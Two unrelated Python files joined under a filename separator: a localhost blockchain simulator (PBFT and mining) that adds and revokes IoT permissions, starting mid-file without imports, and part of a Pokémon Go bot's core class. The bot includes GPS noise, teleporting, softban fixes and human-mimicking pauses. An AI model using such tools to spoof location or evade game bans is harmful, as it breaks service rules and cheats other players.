from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
# from urllib.parse import urlparse
from uuid import uuid4
import requests
from flask import Flask, jsonify, request, render_template
from flask_cors import CORS
from blockchain import *
# usleep = lambda x: time.sleep(x/1000000.0)
node_address_d = {}
private_keys_d = {}
public_keys_d = {}
pre_prepare = {}
prepare = {}
commit = {}
reply = {}
total_nodes = 0
TOTALTRASPOST = 100
TOTALTRASFETCH = 100
PORTFACTOR = 5000
current_time_us = lambda: int(round(time() * 1000000))
MINE_MINT = -1
IOT1 = 0
IOT2 = 0
log_suffix = ""
commit_counter = 0
def signal_handler(sig, frame):
print('You pressed Ctrl+C! MPP Exit.')
sys.exit(0)
def blockchain_node(pid, total_nodes, node_address_d, lock):
global commit_counter
# global lock
# global node_address_d
if pid == 0:
fh = open('keys', 'w')
else:
fh = open('addresses', 'a')
ret = new_wallet()
private_key = ret['private_key']
public_key = ret['public_key']
private_keys_d[pid] = private_key
public_keys_d[pid] = public_key
node = Blockchain()
uuid = node.node_id
node_address_d[pid] = uuid
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind the socket to the port
server_address = ('localhost', PORTFACTOR+pid)
print ('Starting up node on <port,pid,UUID>:', (PORTFACTOR+pid), pid, str(uuid))
sock.bind(server_address)
count = 0
pbft_d = {}
ct_count = 0
desired_count = int(total_nodes/3)
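    # Commit-vote threshold used below: a block is appended once matching 'CT'
    # messages from roughly one third of the nodes have been collected (assumed
    # here to approximate a PBFT-style quorum for this simulation).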
first_value = ""
while True:
# print (pid, "recv")
data, address = sock.recvfrom(4096)
data = data.decode().split(">")
# print (data)
flag = data[0]
# New transaction
if flag == "FT":
# print (pid, "FETCH")
t_value = data[1]
t_value_in = t_value+"~"
match_found = 'N'
# for i in range(0, len(node.chain)):
i = len(node.chain) - 1
while i >= 0:
trans = node.chain[i]['transactions']
if len(trans) > 0:
for d in trans:
if d['value'] == t_value:
match_found = 'V'
elif d['value'] == t_value_in:
match_found = 'R'
if match_found != 'N':
break
i -= 1
# print ("BLOCK: ", i, d['value'])
data = str(current_time_us())+','+str(match_found)+','+data[1]
# print ("SENDING FT RESP: ", data)
sent = sock.sendto(data.encode(), address)
elif flag == 'FA': # Fetch all Transaction
all_trans = ""
print (pid, len(node.chain))
for i in range(0, len(node.chain)):
trans = node.chain[i]['transactions']
if len(trans) > 0:
for d in trans:
all_trans += str(d)+"\n"
print ("BLOCK: ", pid, i, d)
fh = open("./logs/all_transactions_"+str(pid), "w")
fh.write(all_trans)
all_trans = ""
fh.close()
elif flag == 'NT': # New transaction
msg = json.loads(data[1])
# print ('received %s bytes from %s' % (len(data), address))
# print (flag, msg )
count += 1
ret = new_transaction(node, msg)
# print (pid, ret)
elif flag == 'PP': # PBFT Pre-prepare
# print (pid, 'PP', data)
message = 'PR>'+str(data[1])+'>'+data[2]+'>'+data[3]
pbft_prepare(sock, total_nodes, pid, message, PORTFACTOR)
elif flag == 'PR': # PBFT Prepare
# print (pid, 'PR')
message = 'CT>'+str(data[1])+'>'+data[2]+'>'+data[3]
pbft_commit(sock, total_nodes, pid, message, PORTFACTOR)
elif flag == 'CT': # PBFT Commit
# print (pid, 'CT')
# ct_count += 1
if data[2] != first_value:
pbft_d[address] = data[2]
if len(pbft_d) >= desired_count:
keys = list(pbft_d.keys())
first_value = pbft_d[keys[0]]
ct_count += 1
for i in range(1, len(pbft_d)):
if pbft_d[keys[i]] == first_value:
ct_count += 1
if ct_count >= desired_count:
if pid != int(data[1]):
block = json.loads(data[3])
node.chain.append(block)
# lock.acquire()
# commit_counter += 1
# lock.release()
# sleep(0.00001)
# commit_counter += 1
pbft_d = {}
if count > 0:
if MINE_MINT == 0:
ret = mine(node)
count = 0
# print ("MINE: ", ret)
# print ("MINE: ",pid)
elif MINE_MINT == 1:
ret = mint(node, total_nodes, pid, sock, PORTFACTOR)
count = 0
# print ("MINT: ", pid)
def test_transaction_generator_all_nodes(sock, value):
# serv_port = random.randint(0,total_nodes+100) % total_nodes
server_address = ('localhost', PORTFACTOR+0)
# message = 'This is the message. It will be repeated.'
# print (len(private_keys_d), len(public_keys_d))
# value = 'A-B'
gen_trans = generate_transaction(node_address_d[0], private_keys_d[0], node_address_d[1], value)
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
print ('sending trans to "%s"' % str(server_address))
sent = sock.sendto(message.encode(), server_address)
except Exception as EE:
print ("Exeception transaction_generator_all_nodes: ", EE)
def transaction_set_generator(sock, node_id):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
while iot_1 < IOT1:
print ("transaction_set_generator:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
val = str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value + "\n"
trans_log += val
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
sent = sock.sendto(message.encode(), server_address)
except Exception as EE:
print ("Exeception transaction_generator_all_nodes: ", EE)
# sleep(0.001)
iot_1 += 1
fh = open("./logs/transaction_set_generator_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
def transaction_set_revoker_and_get_delayed(sock, node_id, lock):
# global lock
global commit_counter
total_trans = 0
trans_log = ""
get_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
lock.acquire()
try:
commit_counter = 0
finally:
lock.release()
print ("ST:", commit_counter)
fh_1 = open("./logs/transaction_set_revoker_and_get_delayed_GETRESP_LOG_"+log_suffix, "w")
while iot_1 < IOT1:
print ("REV:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)+'~'
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
# REVOKE TRANSACTION
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val = "REV,"+str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value
trans_log += val+"\n"
except Exception as EE:
print ("Exeception transaction_set_revoker_and_get_delayed: ", EE)
# delay = float(random.randint(1,20))/1000.0 #10
delay = float(random.randint(1,50))/1000.0 #10
# delay = float(random.randint(17,100))/1000.0 # 15
# print (delay)
sleep(delay)
temp_ts = current_time_us()
y = 0
# serv_port = PORTFACTOR+2
# serv_port = PORTFACTOR+int(total_nodes/2)+1
serv_port = PORTFACTOR+int(total_nodes)-1
# while commit_counter < 2:
# while commit_counter < int(total_nodes/2)+1:
while commit_counter < int(total_nodes)-1:
# while commit_counter < 3:
# lock.acquire()
# try:
# if commit_counter < int(total_nodes)-1:
# y = -10
# finally:
# lock.release()
# lock.acquire()
# # if commit_counter >= 1:
# if commit_counter >= int(total_nodes/2)+1:
# # if commit_counter >= int(total_nodes)-1:
# y = -10
# lock.release()
# sleep(0.015)
# y = 1
sleep(0.019)
y += 1
if y > 200 or y < 0: # 20000000 = 1sec; 10000000 = 0.5sec //y > 20000000 or
break
lock.acquire()
print (commit_counter)
commit_counter = 0
lock.release()
# GET
value = str(iot_1)+"-"+str(iot_2)
message = "FT"+">"+str(value)
try:
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val += ",FT,"+str(temp_ts)+","+ str(serv_port)+","+str(server_address) + "," + value
# get_log += val
data, address = sock.recvfrom(4096)
data = data.decode()
val += ",RESP,"+str(data) + "," + str(address) + "\n"
# print (rep)
fh_1.write(val)
# get_log += val
except Exception as EE:
print ("Exeception transaction_set_revoker_and_get_delayed: ", EE)
sleep(0.05)
# sleep(0.001)
iot_1 += 1
fh_1.close()
fh = open("./logs/transaction_set_revoker_and_get_delayed_REVOKE_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
def transaction_set_revoker_and_get(sock, node_id):
total_trans = 0
trans_log = ""
get_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
while iot_1 < IOT1:
print ("transaction_set_revoker_and_get:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)+'~'
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
# REVOKE TRANSACTION
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
serv_port = PORTFACTOR+node_id
# serv_port = PORTFACTOR+1
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val = "REV,"+str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value
trans_log += val+"\n"
except Exception as EE:
print ("Exeception transaction_set_revoker_and_get: ", EE)
# GET
value = str(iot_1)+"-"+str(iot_2)
message = "FT"+">"+str(value)
try:
# serv_port = PORTFACTOR+int(total_nodes/2)+1
serv_port = PORTFACTOR+1
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val += ",FT,"+str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value
# get_log += val
data, address = sock.recvfrom(4096)
data = data.decode()
val += ",RESP,"+str(data) + "," + str(address) + "\n"
# print (rep)
get_log += val
except Exception as EE:
print ("Exeception get_persmission_value: ", EE)
# sleep(0.001)
iot_1 += 1
fh = open("./logs/transaction_set_revoker_and_get_REVOKE_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
fh = open("./logs/transaction_set_revoker_and_get_GETRESP_LOG_"+log_suffix, "w")
fh.write(get_log)
fh.close()
# To be run in a separate thread
def transaction_set_revoker(sock, node_id):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
while iot_1 < IOT1:
# print ("REV:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)+'~'
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
# REVOKE
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
sent = sock.sendto(message.encode(), server_address)
val = str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value + "\n"
trans_log += val
except Exception as EE:
print ("Exeception transaction_set_revoker: ", EE)
# sleep(0.001)
iot_1 += 1
fh = open("./logs/transaction_set_revoker_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
def get_persmission_value(sock, node_id):
total_trans = 0
trans_log = ""
resp_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
while iot_1 < IOT1:
# print ("GET:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)
val = str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value + "\n"
trans_log += val
# x = json.dumps(value)
message = "FT"+">"+str(value)
try:
sent = sock.sendto(message.encode(), server_address)
data, address = sock.recvfrom(4096)
data = data.decode()
rep = str(data) + "," + str(address) + "\n"
# print (rep)
resp_log += rep
except Exception as EE:
print ("Exeception get_persmission_value: ", EE)
sleep(0.001)
iot_1 += 1
fh = open("./logs/get_persmission_value_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
fh = open("./logs/get_persmission_value_response_LOG_"+log_suffix, "w")
fh.write(resp_log)
fh.close()
def transaction_generator_all_nodes(sock):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 2
revoke = 0
while total_trans < TOTALTRASPOST:
serv_port = random.randint(0,total_nodes+100) % total_nodes
server_address = ('localhost', PORTFACTOR+serv_port)
# message = 'This is the message. It will be repeated.'
# print (len(private_keys_d), len(public_keys_d))
if (revoke % 10) == 0:
value = str(int(iot_1/2))+"-"+str(int(iot_2/3))+"~"
else:
value = str(iot_1)+"-"+str(iot_2)
iot_1 += 1
iot_2 += 1
revoke += 1
gen_trans = generate_transaction(node_address_d[0], private_keys_d[0], node_address_d[1], value)
val = str(current_time_us())+","+str(serv_port) + "," + value + "\n"
trans_log += val
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
# print ('sending trans to "%s"' % str(server_address))
sent = sock.sendto(message.encode(), server_address)
except Exception as EE:
print ("Exeception transaction_generator_all_nodes: ", EE)
total_trans += 1
sleep(0.1)
fh = open("./logs/trans_logs", "w")
fh.write(trans_log)
fh.close()
def transaction_fetcher(sock):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 2
revoke = 0
print ("\n\n transaction_fetcher\n\n")
while total_trans < TOTALTRASFETCH:
serv_port = random.randint(0,total_nodes+100) % total_nodes
server_address = ('localhost', PORTFACTOR+serv_port)
iot_1 = random.randint(0,100)
iot_2 = random.randint(0,100)
if iot_1 == iot_2:
iot_2 += 1
if revoke % 5 == 0:
message = 'FT>' + str(iot_1) + '-' + str(iot_2) + '~'
else:
message = 'FT>' + str(iot_1) + '-' + str(iot_2)
print ('FT :', str(server_address), message)
try:
tstamp = str(current_time_us())
sent = sock.sendto(message.encode(), server_address)
data, server = sock.recvfrom(4096)
data = data.decode()
print ("RET:", data)
val = tstamp + "," + str(serv_port) + "," + message + "," + str(data) + "\n"
trans_log += val
except Exception as tf:
print("Exception transaction_fetcher: ". tf)
total_trans += 1
revoke += 1
sleep(0.2)
fh = open("./logs/transaction_fetch_logs", "w")
fh.write(trans_log)
fh.close()
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal_handler)
args = sys.argv[1:]
argc = len(args)
if argc != 6:
print ("Usage Issue. Need 6 Argument.")
print ("python3.7 executer.py <no of nodes> <PoV or PoA> <Port Factor> <IoT_1> <IoT_2> <suffics>")
exit(1)
process_list = []
total_nodes = int(args[0])
MINE_MINT = int(args[1]) # 0 MINE 1 MINT
PORTFACTOR = int(args[2])
IOT1 = int(args[3])
IOT2 = int(args[4])
suffics = args[5]
# t = time()
# y = 0
# while True:
# y += 1
# if y > 10000000:
# break
# print ("TIME: ", time() - t)
# exit(1)
print ("Number of Nodes = ", total_nodes)
if MINE_MINT == 0:
print ("Consensus Algorithm : Proof of Work using Mining")
elif MINE_MINT == 1:
print ("Consensus Algorithm : PBFT")
else:
print ("Please provide Consensus Algorithm : 0 = Mining, 1 = PBFT")
exit(1)
log_suffix = str(total_nodes)+"_"+str(MINE_MINT)+"_"+str(IOT1)+"_"+str(IOT2)+"_"+suffics
for i in range(0, total_nodes):
node_address_d[i] = ""
lock = threading.Lock()
# try:
print (node_address_d)
for i in range(0, total_nodes):
# p = multiprocessing.Process(target=busy_hour, args=(i, source_list[i], dest_path, prefix_list[i]))
p = threading.Thread(target=blockchain_node, args=(i, total_nodes, node_address_d, lock))
process_list.append(p)
p.start()
sleep(0.3)
sleep(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# test_transaction_generator_all_nodes(sock, 'A-B')
# test_transaction_generator_all_nodes(sock, 'A-C')
# transaction_set_generator(sock, 0)
# print ("IOT PERMISSION SET ADDED")
# sleep(1)
# tr = threading.Thread(target=transaction_set_revoker, args=(sock,0))
# gt = threading.Thread(target=get_persmission_value, args=(sock,0))
# gt.start()
# tr.start()
# print ("STARTING REVOKE AND GET THREADS")
# tr.join()
# gt.join()
# print ("REVOKE AND GET THREADS COMPLETE")
print ("ADDING IOT DEVICE PERMISSIONS")
transaction_set_generator(sock, 0)
print ("IOT PERMISSION SET ADDED")
sleep(1)
# print ("Starting transaction_set_revoker_and_get")
# t = threading.Thread(target=transaction_set_revoker_and_get, args=(sock,0))
# t.start()
# t.join()
# print ("End transaction_set_revoker_and_get")
print ("Starting transaction_set_revoker_and_get_delayed")
t = threading.Thread(target=transaction_set_revoker_and_get_delayed, args=(sock,0, lock))
t.start()
t.join()
print ("End transaction_set_revoker_and_get_delayed")
# # add transactions and fetch in parallel
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# p = threading.Thread(target=transaction_generator_all_nodes, args=(sock,))
# process_list.append(p)
# p.start()
# t = threading.Thread(target=transaction_fetcher, args=(sock,))
# process_list.append(t)
# t.start()
# p.join()
# t.join()
# print ("FETCHING ALL")
# sleep(1)
# for i in range(0, total_nodes):
# server_address = ('localhost', PORTFACTOR+i)
# message = "FA>all"
# try:
# print ('sending "%s"' % message)
# sent = sock.sendto(message.encode(), server_address)
# except Exception as E:
# print ("Exception in FA:", E)
# sleep(0.5)
for p in process_list:
p.join()
|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
import cell_workers
from base_task import BaseTask
from plugin_loader import PluginLoader
from api_wrapper import ApiWrapper
from cell_workers.utils import distance
from event_manager import EventManager
from human_behaviour import sleep
from item_list import Item
from metrics import Metrics
from pokemongo_bot.event_handlers import LoggingHandler, SocketIoHandler, ColoredLoggingHandler, SocialHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from pokemongo_bot.datastore import _init_database, Datastore
from worker_result import WorkerResult
from tree_config_builder import ConfigException, MismatchTaskApiVersion, TreeConfigBuilder
import inventory  # needed for inventory.items()/pokemons() used below
from inventory import init_inventory
from sys import platform as _platform
import struct
class PokemonGoBot(Datastore):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
def __init__(self, config):
# Database connection MUST be setup before migrations will work
self.database = _init_database('/data/{}.db'.format(config.username))
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
# Theading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
def start(self):
self._setup_event_system()
self._setup_logging()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self):
handlers = []
if self.config.logging_color:
handlers.append(ColoredLoggingHandler())
else:
handlers.append(LoggingHandler())
if self.config.enable_social:
handlers.append(SocialHandler(self))
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
self.event_manager = EventManager(*handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
    # Emitting the event is then enough to add logging and to send the
    # websocket message:
    # self.event_manager.emit('location', level='info', data={'lat': 1, 'lng': 1})
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=('time',)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# random alive pause
self.event_manager.register_event(
'next_random_alive_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_alive_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms',
'pokemon_name'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event('enough_ultraballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp', 'xp', 'candy')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
self.event_manager.register_event('catch_limit')
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'pokemon',
'cp', 'iv', 'exp', 'stardust', 'candy'
)
)
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'below_iv', 'below_cp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'candy')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
# dont cache when teleport_to
if self.api.teleporting:
return
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
